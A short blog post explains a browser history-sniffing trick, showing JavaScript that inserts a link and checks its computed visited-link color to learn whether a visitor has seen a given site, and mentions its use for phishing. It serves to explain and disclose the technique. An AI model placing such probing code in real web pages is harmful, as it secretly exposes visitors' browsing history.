Stealing browser history
Jeremiah Grossman has posted a fascinating demonstration for how a website could find out which other websites a particular visitor has viewed. (If you don’t see it: look at “I know where you’ve been” section on the sidebar. Recognize any pages you’ve visited recently?)
The way it works is brilliantly simple. Suppose you want to check whether your visitor has recently visited www.tetromino.net/blog. To do so, in javascript, you create a link to the website in question:
var link = document.createElement("a");
link.id = "id_steal_the_history";
link.href = "http://www.tetromino.net/blog/";
link.innerHTML = "http://www.tetromino.net/blog/";
document.body.appendChild(link);
You then check whether the link’s style matches the style for visited links in your stylesheet:
var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
if (color == "rgb(184, 91, 90)") {
// hack the gibson
}
And then you simply remove the link whose color you were testing:
document.body.removeChild(link);
Note that this method doesn’t give you the user’s browser history — it only allows you to test whether a given site is in the history or not. However, for many phishing applications, that would be quite enough. Unfortunately, I can’t think of any way to protect yourself from the attack besides setting a user stylesheet that displays visited and non-visited links in exactly the same style. And that would make the web an ugly, dreary place…